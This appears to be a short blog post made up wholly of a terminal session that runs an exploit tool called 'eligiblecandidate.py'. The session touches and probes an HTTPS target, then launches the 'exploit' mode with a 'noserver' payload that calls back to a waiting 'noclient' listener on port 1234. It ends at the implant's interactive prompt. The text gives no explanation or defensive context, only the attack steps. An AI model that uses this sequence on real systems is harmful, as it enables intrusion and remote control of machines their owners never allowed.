# cat ELCA.txt
# LD_LIBRARY_PATH=/current/bin/lib ./noclient -l 1234
Waiting...
# LD_LIBRARY_PATH=/current/bin/lib ./eligiblecandidate.py -t https://127.0.0.1:443 touch
# LD_LIBRARY_PATH=/current/bin/lib ./eligiblecandidate.py -l probe
# LD_LIBRARY_PATH=/current/bin/lib ./eligiblecandidate.py -l exploit -p noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static -c 127.0.0.1:1234
# LD_LIBRARY_PATH=/current/bin/lib ./noclient -l 1234
NO! (none):>-help
NO! (none):>
No comments:
Post a Comment